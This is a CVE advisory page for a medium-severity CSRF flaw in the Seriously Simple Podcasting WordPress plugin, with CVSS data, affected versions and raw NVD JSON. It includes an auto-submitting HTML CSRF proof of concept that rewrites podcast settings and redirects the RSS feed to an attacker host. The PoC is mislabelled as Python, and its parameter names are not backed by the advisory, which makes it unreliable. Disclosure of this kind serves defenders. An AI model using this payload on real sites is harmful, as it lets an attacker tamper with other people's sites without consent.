Security Vulnerability Report
中文
CVE-2025-66061 CVSS 4.3 MEDIUM

CVE-2025-66061

Published: 2025-11-21 13:15:47
Last Modified: 2026-04-27 18:16:32

Description

Cross-Site Request Forgery (CSRF) vulnerability in Craig Hewitt Seriously Simple Podcasting seriously-simple-podcasting allows Cross Site Request Forgery.This issue affects Seriously Simple Podcasting: from n/a through <= 3.13.0.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:castos:seriously_simple_podcasting:*:*:*:*:*:wordpress:*:* - VULNERABLE
Seriously Simple Podcasting <= 3.13.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-66061 --> <!-- This PoC demonstrates how an attacker can trick an authenticated admin --> <!-- into modifying Seriously Simple Podcasting settings without their knowledge --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-66061</title> </head> <body> <h1>CSRF PoC for Seriously Simple Podcasting Plugin</h1> <p>If the admin visits this page while logged in, their podcast settings will be modified.</p> <form action="http://target-site/wp-admin/admin-ajax.php" method="POST" id="csrf-form"> <!-- Required nonce verification is missing in vulnerable version --> <input type="hidden" name="action" value="ssp_settings"> <input type="hidden" name="podcast_title" value="Malicious Podcast Title - Hacked"> <input type="hidden" name="podcast_description" value="This site has been compromised via CSRF"> <input type="hidden" name="rss_feed_url" value="https://attacker-controlled-site.com/feed.xml"> <input type="hidden" name="submit" value="Save Settings"> </form> <script> // Auto-submit form when page loads document.getElementById('csrf-form').submit(); console.log('CSRF request sent successfully'); </script> <!-- Alternative: Image tag-based request (older technique) --> <!-- <img src="http://target-site/wp-admin/admin-ajax.php?action=ssp_settings&podcast_title=Hacked" width="0" height="0"> --> </body> </html> <!-- Mitigation: Add nonce verification in plugin code --> <!-- Example fix in PHP: --> <!-- if (!wp_verify_nonce($_POST['nonce'], 'ssp_settings_nonce')) { --> <!-- wp_die('Security check failed'); --> <!-- } -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66061", "sourceIdentifier": "[email protected]", "published": "2025-11-21T13:15:46.920", "lastModified": "2026-04-27T18:16:31.960", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Craig Hewitt Seriously Simple Podcasting seriously-simple-podcasting allows Cross Site Request Forgery.This issue affects Seriously Simple Podcasting: from n/a through <= 3.13.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:castos:seriously_simple_podcasting:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "3.14.0", "matchCriteriaId": "201F9458-7BDE-4E42-85DD-AB15D5B6A90E"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/seriously-simple-podcasting/vulnerability/wordpress-seriously-simple-podcasting-plugin-3-13-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}